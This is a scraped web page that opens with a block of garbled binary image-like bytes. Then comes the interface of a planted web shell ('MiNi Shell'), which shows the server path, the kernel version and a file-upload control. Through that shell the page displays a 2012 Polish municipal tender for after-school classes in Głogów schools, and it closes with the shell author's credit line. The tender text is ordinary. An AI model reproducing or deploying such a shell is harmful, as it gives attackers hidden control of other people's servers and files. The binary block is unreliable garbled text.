JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/437096-N-2012.html

<p class="kh_header"><b>Głogów: Prowadzenie zajęć pozalekcyjnych w Szkole Podstawowej Nr 2, 3, 6, 7, 10,12 i 14 
w Głogowie w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I- III  szkół podstawowych Gminy Miejskiej Głogów w kontekście 
wdrażania nowej podstawy kształcenia</b><br>
<b>Numer ogłoszenia: 437096 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć pozalekcyjnych w Szkole Podstawowej Nr 2, 3, 6, 7, 10,12 i 14 
w Głogowie w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I- III  szkół podstawowych Gminy Miejskiej Głogów w kontekście 
wdrażania nowej podstawy kształcenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Opis przedmiotu zamówienia.
1.Przedmiotem zamówienia jest usługa polegająca na prowadzeniu zajęć pozalekcyjnych w Szkole Podstawowej Nr 2, 3, 6, 7, 10,12 i 14 w Głogowie w ramach projektu pod nazwą Indywidualizacja procesu nauczania i wychowania uczniów klas I- III  szkół podstawowych Gminy Miejskiej Głogów w kontekście wdrażania nowej podstawy kształcenia  współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.
Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację, ewaluację  i dokumentację zajęć dodatkowych dla uczniów w oparciu o program rozwojowy szkoły oraz założenia wniosku o dofinansowanie projektu. Działania dostosowywane będą do potrzeb uczniów, w ramach zajęć wyrównawczych, kół zainteresowań, zajęć specjalistycznych i logopedycznych. Prowadzenie zajęć ma na celu  wyrównania szans edukacyjnych poprzez indywidualizację procesu kształcenia i zapewnienie wysokiej jakości świadczonych usług edukacyjnych. 

2.Obowiązki prowadzącego zajęcia pozalekcyjne:
a) przygotowanie programu m.in. w oparciu o założenia projektu i programu rozwojowego szkoły,
b) prowadzenie zajęć pozalekcyjnych (podział godzin w zależności od części , zgodnie z harmonogramem stanowiącym załącznik do umowy o dofinansowanie przedmiotowego projektu)
c) dokumentowanie zajęć pozalekcyjnych ( prowadzenie dzienników zajęć, list obecności)
d) przygotowanie  sprawozdań miesięcznych z realizacji zajęć poprzez sporządzanie spra-wozdań i innych dokumentów
e) ewaluacja zajęć,
f) monitorowanie zajęć i rezultatów prowadzonych zajęć,
g) inne  zadania wynikające z prawidłowej realizacji projektu, o którym mowa powyżej, w tym współpraca z członkami Zespołu Projektowego, udział w kontrolach projektu na miejscu,
h) przestrzeganie polityk horyzontalnych Unii Europejskiej,

3. Poniżej podział postępowania na części w zależności od rodzaju zajęć pozalekcyjnych. 
Ilość godzin podana dla poszczególnych części przetargu dotyczy całego okresu realizacji projektu tj 2012r. + 2013r. 
Zamówienie obejmuje  57  części
Segment A:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także za-grożonych ryzykiem dysleksji
Część A1	SP2	12 + 20 = 32h
Część A2	SP2	12 + 20 = 32h
Część A3	SP3	12 + 20 = 32h
Część A4	SP3	12 + 20 = 32h
Część A5	SP6	13 + 21 = 34h
Część A6	SP6	 13 + 21 = 34h
Część A7	SP6	 13 + 21 = 34h
Część A8	SP7	 13 + 20 = 33h
Część A9	SP7	 13 + 20 = 33h
Część A10	SP10	 13 + 20 = 33h
Część A11	SP10	 13 + 20 = 33h
Część A12	SP10	 13 + 20 = 33h
Część A13	SP10	 13 + 20 = 33h

Segment B:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
Część B1	SP2	12 + 20 = 32h
Część B2	SP2	12 + 20 = 32h
Część B3	SP3	12 + 20 = 32h
Część B4	SP3	12 + 20 = 32h
Część B5	SP3	12 + 20 = 32h
Część B6	SP6	 14 + 20= 34h
Część B7	SP6	 14 + 20 = 34h
Część B8	SP10	  13 + 20 = 33h
Część B9	SP10	  13 + 20 = 33h
Część B10	SP10	  13 + 20 = 33h
Część B11	SP10	  13 + 20 = 33h
Część B12	SP14	  13 + 20 = 33h



Segment C:
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy

Część C1	SP2	12 + 20 = 32h
Część C2	SP3	12 + 20 = 32h
Część C3	SP6	13 + 20 = 33h
Część C4	SP7	 15h
Część C5	SP10	13 + 20 = 33h
Część C6	SP10	13 + 20 = 33h
Część C7	SP12	 30h

Segment D:
Gimnastyka korekcyjna dla dzieci z wadami postawy

Część D1	SP2	12 + 20 = 32h
Część D2	SP2	12 + 20 = 32h
Część D3	SP6	13 + 20 = 33h

Segment E:
Zajęcia rozwijające zainteresowania uczniów wybitnych, szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych 
Część E1	SP2	12 + 20 = 32h
Część E2	SP2	12 + 20 = 32h
Część E3	SP3	11 + 20 = 31h
Część E4	SP3	11 + 20 = 31h
Część E5	SP6	13 + 20 = 33h
Część E6	SP7	  13 + 20 = 33h
Część E7	SP7	 13 + 20 = 33h
Część E8	SP10	 26 + 40 = 66h
Część E9	SP10	 26 + 40 = 66h
Część E10	SP14	 13 + 20 = 33h
Część E11	SP14	 13 + 20 = 33h

Segment F:
Zajęcia rozwijające zainteresowania uczniów wybitnych, szczególnie uzdolnionych zaję-cia plastyczne
Część F1	SP2	  12 + 20 = 32h
Część F2	SP3	  12 + 20 = 32h
Część F3	SP6	  13 + 20 = 33h
Część F4	SP7	  13 + 20 = 33h
Część F5	SP14	  13 + 20 = 33h

Segment G:
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej
Część G1	SP2	  12 + 20 = 32h
Część G2	SP10	  13 + 20 = 33h
Część G3	SP10	  13 + 20 = 33h
Część G4	SP12	  13 + 20 = 33h
Część G5	SP14	  13 + 20 = 33h


Segment H:
Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych - Integracja  Senso-ryczna 
Część H1	SP12	13 + 20 = 33h.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 57.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, a w szczególności osobą posiadającą: Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób ,które będą odpowiedzialne za realizację zamówienia oraz oświadczenia ,że osoby te posiadają wymagane uprawnienia na zasadzie spełnia - nie spełnia. 

- dla części od A1 do A13:
.	Wykształcenie: Wyższe magisterskie pedagogiczne po kierunku: nauczanie początkowe, nauczanie początkowe i wychowanie przedszkolne, wychowanie przedszkolne i nauczanie początkowe, pedagogika w zakresie nauczania początkowego, pedagogika w zakresie nauczania początkowego i wychowania przedszkolnego, pedagogika wczesnoszkolna, edukacja wczesnoszkolna i arteterapia, filologia polska, pedagogika szkolna; studia podyplomowe: z zakresu nauczania początkowego, terapia pedagogiczna
.	Staż pracy: co najmniej 2 lata w szkole podstawowej
.	Stopień awansu zawodowego: co najmniej nauczyciel kontraktowy

- dla części od B1 do B 12:
.	Wykształcenie: Wyższe magisterskie pedagogiczne po kierunku: nauczanie początko-we i wychowanie przedszkolne, pedagogika w zakresie nauczania początkowego, pe-dagogika wczesnoszkolna, edukacja wczesnoszkolna; studia podyplomowe: z zakresu nauczania początkowego
.	Staż pracy: co najmniej 2 lata w szkole podstawowej
.	Stopień awansu zawodowego: co najmniej nauczyciel kontraktowy


-dla części od C1 do C7:
.	Wykształcenie: Wyższe magisterskie  z przygotowaniem pedagogicznym; studia po-dyplomowe z zakresu: logopedia z emisją i higieną głosu, logopedia ogólna, logope-dia, logopedia z terapią pedagogiczną
.	Nauczyciel czynnie pracujący w szkole
.	Staż pracy: co najmniej 3 lata w szkole 
.	Stopień awansu zawodowego: co najmniej nauczyciel kontraktowy

-dla części od D1 do D3:
.	Wykształcenie: wyższe pedagogiczne
.	Nauczyciel czynnie pracujący w szkole
.	Staż pracy: minimum 7 lat pracy w szkole
.	Staż w prowadzeniu zajęć z gimnastyki korekcyjnej: minimum 7 lat
.	Stopień awansu zawodowego: minimum nauczyciel mianowany

- dla części od E1 do E11:
.	Wykształcenie: Wyższe magisterskie pedagogiczne - edukacja wczesnoszkolna (na-uczanie początkowe)
.	Staż pracy: minimum 3 lata
.	Stopień awansu zawodowego: minimum nauczyciel kontraktowy
- dla części F1 do F5:
.	Wykształcenie: wyższe pedagogiczne
.	Staż pracy: minimum 12 lat w szkole podstawowej
.	Stopień awansu zawodowego: minimum nauczyciel mianowany

- dla części od G1 do G5:
.	Wykształcenie: wyższe w zakresie wychowania przedszkolnego i nauczania począt-kowego , studia podyplomowe w zakresie terapii pedagogicznej,
.	Staż pracy pedagogicznej: co najmniej 13 lat
.	Prowadzenie zajęć socjoterapeutycznych: co najmniej  1 rok,
.	Stopień awansu zawodowego: nauczyciel mianowany,

-dla części H 1:
.	Wykształcenie: wyższe magisterskie na kierunku pedagogika, doświadczenie zawo-dowe w prowadzeniu zajęć rewalidacyjnych
.	Staż pracy: minimum 2-letnie doświadczenie zawodowe w prowadzeniu zajęć Integra-cji Sensorycznej
.	Stopień awansu zawodowego: nauczyciel mianowany</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony  załącznik nr 1 - formularz OFERTA .
2)	Pełnomocnictwo, określające jego zakres w przypadku gdy wykonawcę reprezentuje peł-nomocnik,
  3)W przypadku wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo 
     do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania 
       w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4) Zobowiązania innych podmiotów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.	Zmiany umowy:
1)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2)	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3)	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy 
w formie pisemnego aneksu na następujących warunkach :
a)	Wykonawca może dokonywać zmiany kluczowych osób, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, 
b)	Pozostałe zmiany 
.	rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
.	termin rozpoczęcia realizacji przedmiotu umowy może ulec zmianie na skutek przedłużającej się procedury przetargowej.
c)	Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy po-przez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
.	opis zmiany,
.	uzasadnienie zmiany,
.	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
.	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
d)	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powsta-łych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 14:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.125.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Priorytet IX Rozwój wykształcenia i kompetencji w regionach. Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edu-kacyjnych świadczonych w systemie oświaty. Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostę-pie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com